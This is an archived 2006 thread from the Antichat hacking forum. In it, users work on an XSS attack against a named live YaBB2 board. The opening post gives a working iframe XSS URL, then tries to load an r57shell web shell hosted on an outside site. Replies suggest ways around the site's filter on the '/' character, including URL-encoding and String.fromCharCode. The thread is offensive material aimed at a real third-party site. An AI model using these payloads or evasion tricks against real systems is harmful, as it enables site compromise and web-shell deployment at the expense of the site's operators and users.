Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS на Yabb2 Rc1 (https://forum.antichat.xyz/showthread.php?t=28835)

$n@ke 10.12.2006 17:25
XSS на Yabb2 Rc1
 
Первый раз такое, аж обидно!))но здаватся не собираюсь!

_http://board.chatrol.ru/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%2 0SRC%3Djavascript:alert('XSS-Vulnerability')><%252FIFRAME>

вот КСС, подставляю вместо "javascript" src, прописую путь к 57шеллу на народе
PHP код:
http://board.chatrol.ru/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Dhttp://XAK.narod.ru/r57shell.php><%252FIFRAME> 
, но вылезает эррор, типа :
Символ / не может использовацца в логине!Я уж и кодировал строку, и все равно никак!
Кто то может подскажет чтонить?

zl0ba 10.12.2006 18:30
/ > %2f

Ksander 10.12.2006 19:31
Цитата:
Сообщение от $n@ke
прописую путь к 57шеллу на народе
На народе нельзя, он php не поддерживает.

zl0ba 10.12.2006 21:55
Цитата:
Сообщение от Ksander
На народе нельзя, он php не поддерживает.
У него полюбому бы тогда код бы шелла высветелся, а народ, да пхп для него было бы шикарно! :)

$n@ke 11.12.2006 14:28
2 jah
Цитата:
Я уж и кодировал строку
нет, %2f не катит!Я ж грю.!
ну да, код бы должен был показацца!

podkashey 11.12.2006 14:56
$n@ke, попробуй через String.fromCharCode - может получится... Понять о чем это можно здесь https://forum.antichat.ru/thread15709.html


Время: 20:11